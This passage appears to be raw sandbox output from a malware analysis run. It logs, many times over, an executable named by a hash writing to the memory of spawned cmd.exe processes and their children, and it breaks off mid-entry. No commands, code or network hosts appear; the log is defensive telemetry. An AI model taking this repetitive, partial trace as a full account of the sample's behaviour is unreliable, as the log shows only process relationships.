PID 1096 wrote to memory of 776 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 500 PID 776 wrote to memory of 1516 776 cmd.exe 502 PID 776 wrote to memory of 1516 776 cmd.exe 502 PID 776 wrote to memory of 1516 776 cmd.exe 502 PID 776 wrote to memory of 1516 776 cmd.exe 502 PID 776 wrote to memory of 1052 776 cmd.exe 503 PID 776 wrote to memory of 1052 776 cmd.exe 503 PID 776 wrote to memory of 1052 776 cmd.exe 503 PID 776 wrote to memory of 1052 776 cmd.exe 503 PID 776 wrote to memory of 1092 776 cmd.exe 504 PID 776 wrote to memory of 1092 776 cmd.exe 504 PID 776 wrote to memory of 1092 776 cmd.exe 504 PID 776 wrote to memory of 1092 776 cmd.exe 504 PID 1092 wrote to memory of 900 1092 cmd.exe 505 PID 1092 wrote to memory of 900 1092 cmd.exe 505 PID 1092 wrote to memory of 900 1092 cmd.exe 505 PID 1092 wrote to memory of 900 1092 cmd.exe 505 PID 776 wrote to memory of 1808 776 cmd.exe 506 PID 776 wrote to memory of 1808 776 cmd.exe 506 PID 776 wrote to memory of 1808 776 cmd.exe 506 PID 776 wrote to memory of 1808 776 cmd.exe 506 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 507 PID 1276 wrote to memory of 948 1276 cmd.exe 509 PID 1276 wrote to memory of 948 1276 cmd.exe 509 PID 1276 wrote to memory of 948 1276 cmd.exe 509 PID 1276 wrote to memory of 948 1276 cmd.exe 509 PID 1276 wrote to memory of 864 1276 cmd.exe 510 PID 1276 wrote to memory of 864 1276 cmd.exe 510 PID 1276 wrote to memory of 864 1276 cmd.exe 510 PID 1276 wrote to memory of 864 1276 cmd.exe 510 PID 1276 wrote to memory of 1500 1276 cmd.exe 511 PID 1276 wrote to memory of 1500 1276 cmd.exe 511 PID 1276 wrote to memory of 1500 1276 cmd.exe 511 PID 1276 wrote to memory of 1500 1276 cmd.exe 511 PID 1500 wrote to memory of 712 1500 cmd.exe 512 PID 1500 wrote to memory of 712 1500 cmd.exe 512 PID 1500 wrote to memory of 712 1500 cmd.exe 512 PID 1500 wrote to memory of 712 1500 cmd.exe 512 PID 1276 wrote to memory of 616 1276 cmd.exe 513 PID 1276 wrote to memory of 616 1276 cmd.exe 513 PID 1276 wrote to memory of 616 1276 cmd.exe 513 PID 1276 wrote to memory of 616 1276 cmd.exe 513 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 514 PID 1120 wrote to memory of 224 1120 cmd.exe 516 PID 1120 wrote to memory of 224 1120 cmd.exe 516 PID 1120 wrote to memory of 224 1120 cmd.exe 516 PID 1120 wrote to memory of 224 1120 cmd.exe 516 PID 1120 wrote to memory of 2008 1120 cmd.exe 517 PID 1120 wrote to memory of 2008 1120 cmd.exe 517 PID 1120 wrote to memory of 2008 1120 cmd.exe 517 PID 1120 wrote to memory of 2008 1120 cmd.exe 517 PID 1120 wrote to memory of 1816 1120 cmd.exe 518 PID 1120 wrote to memory of 1816 1120 cmd.exe 518 PID 1120 wrote to memory of 1816 1120 cmd.exe 518 PID 1120 wrote to memory of 1816 1120 cmd.exe 518 PID 1816 wrote to memory of 2016 1816 cmd.exe 519 PID 1816 wrote to memory of 2016 1816 cmd.exe 519 PID 1816 wrote to memory of 2016 1816 cmd.exe 519 PID 1816 wrote to memory of 2016 1816 cmd.exe 519 PID 1120 wrote to memory of 1212 1120 cmd.exe 520 PID 1120 wrote to memory of 1212 1120 cmd.exe 520 PID 1120 wrote to memory of 1212 1120 cmd.exe 520 PID 1120 wrote to memory of 1212 1120 cmd.exe 520 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 521 PID 1052 wrote to memory of 1584 1052 cmd.exe 523 PID 1052 wrote to memory of 1584 1052 cmd.exe 523 PID 1052 wrote to memory of 1584 1052 cmd.exe 523 PID 1052 wrote to memory of 1584 1052 cmd.exe 523 PID 1052 wrote to memory of 620 1052 cmd.exe 524 PID 1052 wrote to memory of 620 1052 cmd.exe 524 PID 1052 wrote to memory of 620 1052 cmd.exe 524 PID 1052 wrote to memory of 620 1052 cmd.exe 524 PID 1052 wrote to memory of 776 1052 cmd.exe 525 PID 1052 wrote to memory of 776 1052 cmd.exe 525 PID 1052 wrote to memory of 776 1052 cmd.exe 525 PID 1052 wrote to memory of 776 1052 cmd.exe 525 PID 776 wrote to memory of 1792 776 cmd.exe 526 PID 776 wrote to memory of 1792 776 cmd.exe 526 PID 776 wrote to memory of 1792 776 cmd.exe 526 PID 776 wrote to memory of 1792 776 cmd.exe 526 PID 1052 wrote to memory of 1144 1052 cmd.exe 527 PID 1052 wrote to memory of 1144 1052 cmd.exe 527 PID 1052 wrote to memory of 1144 1052 cmd.exe 527 PID 1052 wrote to memory of 1144 1052 cmd.exe 527 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 1096 wrote to memory of 864 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 528 PID 864 wrote to memory of 1472 864 cmd.exe 530 PID 864 wrote to memory of 1472 864 cmd.exe 530 PID 864 wrote to memory of 1472 864 cmd.exe 530 PID 864 wrote to memory of 1472 864 cmd.exe 530 PID 864 wrote to memory of 320 864 cmd.exe 531 PID 864 wrote to memory of 320 864 cmd.exe 531 PID 864 wrote to memory of 320 864 cmd.exe 531 PID 864 wrote to memory of 320 864 cmd.exe 531 PID 864 wrote to memory of 1068 864 cmd.exe 532 PID 864 wrote to memory of 1068 864 cmd.exe 532 PID 864 wrote to memory of 1068 864 cmd.exe 532 PID 864 wrote to memory of 1068 864 cmd.exe 532 PID 1068 wrote to memory of 1284 1068 cmd.exe 533 PID 1068 wrote to memory of 1284 1068 cmd.exe 533 PID 1068 wrote to memory of 1284 1068 cmd.exe 533 PID 1068 wrote to memory of 1284 1068 cmd.exe 533 PID 864 wrote to memory of 236 864 cmd.exe 534 PID 864 wrote to memory of 236 864 cmd.exe 534 PID 864 wrote to memory of 236 864 cmd.exe 534 PID 864 wrote to memory of 236 864 cmd.exe 534 PID 1096 wrote to memory of 1624 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 535 PID 1096 wrote to memory of 1624 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 535 PID 1096 wrote to memory of 1624 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 535 PID 1096 wrote to memory of 1624 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 535 PID 1624 wrote to memory of 2016 1624 cmd.exe 537 PID 1624 wrote to memory of 2016 1624 cmd.exe 537 PID 1624 wrote to memory of 2016 1624 cmd.exe 537 PID 1624 wrote to memory of 2016 1624 cmd.exe 537 PID 1624 wrote to memory of 1076 1624 cmd.exe 538 PID 1624 wrote to memory of 1076 1624 cmd.exe 538 PID 1624 wrote to memory of 1076 1624 cmd.exe 538 PID 1624 wrote to memory of 1076 1624 cmd.exe 538 PID 1624 wrote to memory of 1548 1624 cmd.exe 539 PID 1624 wrote to memory of 1548 1624 cmd.exe 539 PID 1624 wrote to memory of 1548 1624 cmd.exe 539 PID 1624 wrote to memory of 1548 1624 cmd.exe 539 PID 1548 wrote to memory of 1688 1548 cmd.exe 540 PID 1548 wrote to memory of 1688 1548 cmd.exe 540 PID 1548 wrote to memory of 1688 1548 cmd.exe 540 PID 1548 wrote to memory of 1688 1548 cmd.exe 540 PID 1624 wrote to memory of 960 1624 cmd.exe 541 PID 1624 wrote to memory of 960 1624 cmd.exe 541 PID 1624 wrote to memory of 960 1624 cmd.exe 541 PID 1624 wrote to memory of 960 1624 cmd.exe 541 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 542 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 542 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 542 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 542 PID 2032 wrote to memory of 1792 2032 cmd.exe 544 PID 2032 wrote to memory of 1792 2032 cmd.exe 544 PID 2032 wrote to memory of 1792 2032 cmd.exe 544 PID 2032 wrote to memory of 1792 2032 cmd.exe 544 PID 2032 wrote to memory of 1008 2032 cmd.exe 545 PID 2032 wrote to memory of 1008 2032 cmd.exe 545 PID 2032 wrote to memory of 1008 2032 cmd.exe 545 PID 2032 wrote to memory of 1008 2032 cmd.exe 545 PID 2032 wrote to memory of 900 2032 cmd.exe 546 PID 2032 wrote to memory of 900 2032 cmd.exe 546 PID 2032 wrote to memory of 900 2032 cmd.exe 546 PID 2032 wrote to memory of 900 2032 cmd.exe 546 PID 900 wrote to memory of 1744 900 cmd.exe 547 PID 900 wrote to memory of 1744 900 cmd.exe 547 PID 900 wrote to memory of 1744 900 cmd.exe 547 PID 900 wrote to memory of 1744 900 cmd.exe 547 PID 2032 wrote to memory of 228 2032 cmd.exe 548 PID 2032 wrote to memory of 228 2032 cmd.exe 548 PID 2032 wrote to memory of 228 2032 cmd.exe 548 PID 2032 wrote to memory of 228 2032 cmd.exe 548 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 549 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 549 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 549 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 549 PID 320 wrote to memory of 820 320 cmd.exe 551 PID 320 wrote to memory of 820 320 cmd.exe 551 PID 320 wrote to memory of 820 320 cmd.exe 551 PID 320 wrote to memory of 820 320 cmd.exe 551 PID 320 wrote to memory of 1480 320 cmd.exe 552 PID 320 wrote to memory of 1480 320 cmd.exe 552 PID 320 wrote to memory of 1480 320 cmd.exe 552 PID 320 wrote to memory of 1480 320 cmd.exe 552 PID 320 wrote to memory of 864 320 cmd.exe 553 PID 320 wrote to memory of 864 320 cmd.exe 553 PID 320 wrote to memory of 864 320 cmd.exe 553 PID 320 wrote to memory of 864 320 cmd.exe 553 PID 864 wrote to memory of 1868 864 cmd.exe 554 PID 864 wrote to memory of 1868 864 cmd.exe 554 PID 864 wrote to memory of 1868 864 cmd.exe 554 PID 864 wrote to memory of 1868 864 cmd.exe 554 PID 320 wrote to memory of 1740 320 cmd.exe 555 PID 320 wrote to memory of 1740 320 cmd.exe 555 PID 320 wrote to memory of 1740 320 cmd.exe 555 PID 320 wrote to memory of 1740 320 cmd.exe 555 PID 1096 wrote to memory of 1076 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 556 PID 1096 wrote to memory of 1076 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 556 PID 1096 wrote to memory of 1076 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 556 PID 1096 wrote to memory of 1076 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 556 PID 1076 wrote to memory of 940 1076 cmd.exe 558 PID 1076 wrote to memory of 940 1076 cmd.exe 558 PID 1076 wrote to memory of 940 1076 cmd.exe 558 PID 1076 wrote to memory of 940 1076 cmd.exe 558 PID 1076 wrote to memory of 1808 1076 cmd.exe 559 PID 1076 wrote to memory of 1808 1076 cmd.exe 559 PID 1076 wrote to memory of 1808 1076 cmd.exe 559 PID 1076 wrote to memory of 1808 1076 cmd.exe 559 PID 1076 wrote to memory of 1112 1076 cmd.exe 560 PID 1076 wrote to memory of 1112 1076 cmd.exe 560 PID 1076 wrote to memory of 1112 1076 cmd.exe 560 PID 1076 wrote to memory of 1112 1076 cmd.exe 560 PID 1112 wrote to memory of 1624 1112 cmd.exe 561 PID 1112 wrote to memory of 1624 1112 cmd.exe 561 PID 1112 wrote to memory of 1624 1112 cmd.exe 561 PID 1112 wrote to memory of 1624 1112 cmd.exe 561 PID 1076 wrote to memory of 1152 1076 cmd.exe 562 PID 1076 wrote to memory of 1152 1076 cmd.exe 562 PID 1076 wrote to memory of 1152 1076 cmd.exe 562 PID 1076 wrote to memory of 1152 1076 cmd.exe 562 PID 1096 wrote to memory of 1008 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 563 PID 1096 wrote to memory of 1008 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 563 PID 1096 wrote to memory of 1008 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 563 PID 1096 wrote to memory of 1008 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 563 PID 1008 wrote to memory of 968 1008 cmd.exe 565 PID 1008 wrote to memory of 968 1008 cmd.exe 565 PID 1008 wrote to memory of 968 1008 cmd.exe 565 PID 1008 wrote to memory of 968 1008 cmd.exe 565 PID 1008 wrote to memory of 1500 1008 cmd.exe 566 PID 1008 wrote to memory of 1500 1008 cmd.exe 566 PID 1008 wrote to memory of 1500 1008 cmd.exe 566 PID 1008 wrote to memory of 1500 1008 cmd.exe 566 PID 1008 wrote to memory of 620 1008 cmd.exe 567 PID 1008 wrote to memory of 620 1008 cmd.exe 567 PID 1008 wrote to memory of 620 1008 cmd.exe 567 PID 1008 wrote to memory of 620 1008 cmd.exe 567 PID 620 wrote to memory of 208 620 cmd.exe 568 PID 620 wrote to memory of 208 620 cmd.exe 568 PID 620 wrote to memory of 208 620 cmd.exe 568 PID 620 wrote to memory of 208 620 cmd.exe 568 PID 1008 wrote to memory of 1956 1008 cmd.exe 569 PID 1008 wrote to memory of 1956 1008 cmd.exe 569 PID 1008 wrote to memory of 1956 1008 cmd.exe 569 PID 1008 wrote to memory of 1956 1008 cmd.exe 569 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 570 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 570 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 570 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 570 PID 236 wrote to memory of 1984 236 cmd.exe 572 PID 236 wrote to memory of 1984 236 cmd.exe 572 PID 236 wrote to memory of 1984 236 cmd.exe 572 PID 236 wrote to memory of 1984 236 cmd.exe 572 PID 236 wrote to memory of 212 236 cmd.exe 573 PID 236 wrote to memory of 212 236 cmd.exe 573 PID 236 wrote to memory of 212 236 cmd.exe 573 PID 236 wrote to memory of 212 236 cmd.exe 573 PID 236 wrote to memory of 1740 236 cmd.exe 574 PID 236 wrote to memory of 1740 236 cmd.exe 574 PID 236 wrote to memory of 1740 236 cmd.exe 574 PID 236 wrote to memory of 1740 236 cmd.exe 574 PID 1740 wrote to memory of 320 1740 cmd.exe 575 PID 1740 wrote to memory of 320 1740 cmd.exe 575 PID 1740 wrote to memory of 320 1740 cmd.exe 575 PID 1740 wrote to memory of 320 1740 cmd.exe 575 PID 236 wrote to memory of 1872 236 cmd.exe 576 PID 236 wrote to memory of 1872 236 cmd.exe 576 PID 236 wrote to memory of 1872 236 cmd.exe 576 PID 236 wrote to memory of 1872 236 cmd.exe 576 PID 1096 wrote to memory of 1800 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 577 PID 1096 wrote to memory of 1800 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 577 PID 1096 wrote to memory of 1800 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 577 PID 1096 wrote to memory of 1800 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 577 PID 1800 wrote to memory of 1376 1800 cmd.exe 579 PID 1800 wrote to memory of 1376 1800 cmd.exe 579 PID 1800 wrote to memory of 1376 1800 cmd.exe 579 PID 1800 wrote to memory of 1376 1800 cmd.exe 579 PID 1800 wrote to memory of 948 1800 cmd.exe 580 PID 1800 wrote to memory of 948 1800 cmd.exe 580 PID 1800 wrote to memory of 948 1800 cmd.exe 580 PID 1800 wrote to memory of 948 1800 cmd.exe 580 PID 1800 wrote to memory of 1152 1800 cmd.exe 581 PID 1800 wrote to memory of 1152 1800 cmd.exe 581 PID 1800 wrote to memory of 1152 1800 cmd.exe 581 PID 1800 wrote to memory of 1152 1800 cmd.exe 581 PID 1152 wrote to memory of 1688 1152 cmd.exe 582 PID 1152 wrote to memory of 1688 1152 cmd.exe 582 PID 1152 wrote to memory of 1688 1152 cmd.exe 582 PID 1152 wrote to memory of 1688 1152 cmd.exe 582 PID 1800 wrote to memory of 1836 1800 cmd.exe 583 PID 1800 wrote to memory of 1836 1800 cmd.exe 583 PID 1800 wrote to memory of 1836 1800 cmd.exe 583 PID 1800 wrote to memory of 1836 1800 cmd.exe 583 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 584 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 584 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 584 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 584 PID 1128 wrote to memory of 568 1128 cmd.exe 586 PID 1128 wrote to memory of 568 1128 cmd.exe 586 PID 1128 wrote to memory of 568 1128 cmd.exe 586 PID 1128 wrote to memory of 568 1128 cmd.exe 586 PID 1128 wrote to memory of 712 1128 cmd.exe 587 PID 1128 wrote to memory of 712 1128 cmd.exe 587 PID 1128 wrote to memory of 712 1128 cmd.exe 587 PID 1128 wrote to memory of 712 1128 cmd.exe 587 PID 1128 wrote to memory of 1068 1128 cmd.exe 588 PID 1128 wrote to memory of 1068 1128 cmd.exe 588 PID 1128 wrote to memory of 1068 1128 cmd.exe 588 PID 1128 wrote to memory of 1068 1128 cmd.exe 588 PID 1068 wrote to memory of 1052 1068 cmd.exe 589 PID 1068 wrote to memory of 1052 1068 cmd.exe 589 PID 1068 wrote to memory of 1052 1068 cmd.exe 589 PID 1068 wrote to memory of 1052 1068 cmd.exe 589 PID 1128 wrote to memory of 796 1128 cmd.exe 590 PID 1128 wrote to memory of 796 1128 cmd.exe 590 PID 1128 wrote to memory of 796 1128 cmd.exe 590 PID 1128 wrote to memory of 796 1128 cmd.exe 590 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 591 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 591 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 591 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 591 PID 2016 wrote to memory of 216 2016 cmd.exe 593 PID 2016 wrote to memory of 216 2016 cmd.exe 593 PID 2016 wrote to memory of 216 2016 cmd.exe 593 PID 2016 wrote to memory of 216 2016 cmd.exe 593 PID 2016 wrote to memory of 940 2016 cmd.exe 594 PID 2016 wrote to memory of 940 2016 cmd.exe 594 PID 2016 wrote to memory of 940 2016 cmd.exe 594 PID 2016 wrote to memory of 940 2016 cmd.exe 594 PID 2016 wrote to memory of 1548 2016 cmd.exe 595 PID 2016 wrote to memory of 1548 2016 cmd.exe 595 PID 2016 wrote to memory of 1548 2016 cmd.exe 595 PID 2016 wrote to memory of 1548 2016 cmd.exe 595 PID 1548 wrote to memory of 1480 1548 cmd.exe 596 PID 1548 wrote to memory of 1480 1548 cmd.exe 596 PID 1548 wrote to memory of 1480 1548 cmd.exe 596 PID 1548 wrote to memory of 1480 1548 cmd.exe 596 PID 2016 wrote to memory of 1808 2016 cmd.exe 597 PID 2016 wrote to memory of 1808 2016 cmd.exe 597 PID 2016 wrote to memory of 1808 2016 cmd.exe 597 PID 2016 wrote to memory of 1808 2016 cmd.exe 597 PID 1096 wrote to memory of 1792 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 598 PID 1096 wrote to memory of 1792 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 598 PID 1096 wrote to memory of 1792 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 598 PID 1096 wrote to memory of 1792 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 598 PID 1792 wrote to memory of 972 1792 cmd.exe 600 PID 1792 wrote to memory of 972 1792 cmd.exe 600 PID 1792 wrote to memory of 972 1792 cmd.exe 600 PID 1792 wrote to memory of 972 1792 cmd.exe 600 PID 1792 wrote to memory of 900 1792 cmd.exe 601 PID 1792 wrote to memory of 900 1792 cmd.exe 601 PID 1792 wrote to memory of 900 1792 cmd.exe 601 PID 1792 wrote to memory of 900 1792 cmd.exe 601 PID 1792 wrote to memory of 1472 1792 cmd.exe 602 PID 1792 wrote to memory of 1472 1792 cmd.exe 602 PID 1792 wrote to memory of 1472 1792 cmd.exe 602 PID 1792 wrote to memory of 1472 1792 cmd.exe 602 PID 1472 wrote to memory of 1092 1472 cmd.exe 603 PID 1472 wrote to memory of 1092 1472 cmd.exe 603 PID 1472 wrote to memory of 1092 1472 cmd.exe 603 PID 1472 wrote to memory of 1092 1472 cmd.exe 603 PID 1792 wrote to memory of 896 1792 cmd.exe 604 PID 1792 wrote to memory of 896 1792 cmd.exe 604 PID 1792 wrote to memory of 896 1792 cmd.exe 604 PID 1792 wrote to memory of 896 1792 cmd.exe 604 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 605 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 605 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 605 PID 1096 wrote to memory of 532 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 605 PID 532 wrote to memory of 888 532 cmd.exe 607 PID 532 wrote to memory of 888 532 cmd.exe 607 PID 532 wrote to memory of 888 532 cmd.exe 607 PID 532 wrote to memory of 888 532 cmd.exe 607 PID 532 wrote to memory of 1956 532 cmd.exe 608 PID 532 wrote to memory of 1956 532 cmd.exe 608 PID 532 wrote to memory of 1956 532 cmd.exe 608 PID 532 wrote to memory of 1956 532 cmd.exe 608 PID 532 wrote to memory of 856 532 cmd.exe 609 PID 532 wrote to memory of 856 532 cmd.exe 609 PID 532 wrote to memory of 856 532 cmd.exe 609 PID 532 wrote to memory of 856 532 cmd.exe 609 PID 856 wrote to memory of 796 856 cmd.exe 610 PID 856 wrote to memory of 796 856 cmd.exe 610 PID 856 wrote to memory of 796 856 cmd.exe 610 PID 856 wrote to memory of 796 856 cmd.exe 610 PID 532 wrote to memory of 1976 532 cmd.exe 611 PID 532 wrote to memory of 1976 532 cmd.exe 611 PID 532 wrote to memory of 1976 532 cmd.exe 611 PID 532 wrote to memory of 1976 532 cmd.exe 611 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 612 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 612 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 612 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 612 PID 1284 wrote to memory of 1868 1284 cmd.exe 614 PID 1284 wrote to memory of 1868 1284 cmd.exe 614 PID 1284 wrote to memory of 1868 1284 cmd.exe 614 PID 1284 wrote to memory of 1868 1284 cmd.exe 614 PID 1284 wrote to memory of 236 1284 cmd.exe 615 PID 1284 wrote to memory of 236 1284 cmd.exe 615 PID 1284 wrote to memory of 236 1284 cmd.exe 615 PID 1284 wrote to memory of 236 1284 cmd.exe 615 PID 1284 wrote to memory of 1548 1284 cmd.exe 616 PID 1284 wrote to memory of 1548 1284 cmd.exe 616 PID 1284 wrote to memory of 1548 1284 cmd.exe 616 PID 1284 wrote to memory of 1548 1284 cmd.exe 616 PID 1548 wrote to memory of 1376 1548 cmd.exe 617 PID 1548 wrote to memory of 1376 1548 cmd.exe 617 PID 1548 wrote to memory of 1376 1548 cmd.exe 617 PID 1548 wrote to memory of 1376 1548 cmd.exe 617 PID 1284 wrote to memory of 2016 1284 cmd.exe 618 PID 1284 wrote to memory of 2016 1284 cmd.exe 618 PID 1284 wrote to memory of 2016 1284 cmd.exe 618 PID 1284 wrote to memory of 2016 1284 cmd.exe 618 PID 1096 wrote to memory of 1348 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 619 PID 1096 wrote to memory of 1348 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 619 PID 1096 wrote to memory of 1348 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 619 PID 1096 wrote to memory of 1348 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 619 PID 1348 wrote to memory of 1040 1348 cmd.exe 621 PID 1348 wrote to memory of 1040 1348 cmd.exe 621 PID 1348 wrote to memory of 1040 1348 cmd.exe 621 PID 1348 wrote to memory of 1040 1348 cmd.exe 621 PID 1348 wrote to memory of 1800 1348 cmd.exe 622 PID 1348 wrote to memory of 1800 1348 cmd.exe 622 PID 1348 wrote to memory of 1800 1348 cmd.exe 622 PID 1348 wrote to memory of 1800 1348 cmd.exe 622 PID 1348 wrote to memory of 208 1348 cmd.exe 623 PID 1348 wrote to memory of 208 1348 cmd.exe 623 PID 1348 wrote to memory of 208 1348 cmd.exe 623 PID 1348 wrote to memory of 208 1348 cmd.exe 623 PID 208 wrote to memory of 2032 208 cmd.exe 624 PID 208 wrote to memory of 2032 208 cmd.exe 624 PID 208 wrote to memory of 2032 208 cmd.exe 624 PID 208 wrote to memory of 2032 208 cmd.exe 624 PID 1348 wrote to memory of 1656 1348 cmd.exe 625 PID 1348 wrote to memory of 1656 1348 cmd.exe 625 PID 1348 wrote to memory of 1656 1348 cmd.exe 625 PID 1348 wrote to memory of 1656 1348 cmd.exe 625 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 626 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 626 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 626 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 626 PID 1052 wrote to memory of 228 1052 cmd.exe 628 PID 1052 wrote to memory of 228 1052 cmd.exe 628 PID 1052 wrote to memory of 228 1052 cmd.exe 628 PID 1052 wrote to memory of 228 1052 cmd.exe 628 PID 1052 wrote to memory of 796 1052 cmd.exe 629 PID 1052 wrote to memory of 796 1052 cmd.exe 629 PID 1052 wrote to memory of 796 1052 cmd.exe 629 PID 1052 wrote to memory of 796 1052 cmd.exe 629 PID 1052 wrote to memory of 1972 1052 cmd.exe 630 PID 1052 wrote to memory of 1972 1052 cmd.exe 630 PID 1052 wrote to memory of 1972 1052 cmd.exe 630 PID 1052 wrote to memory of 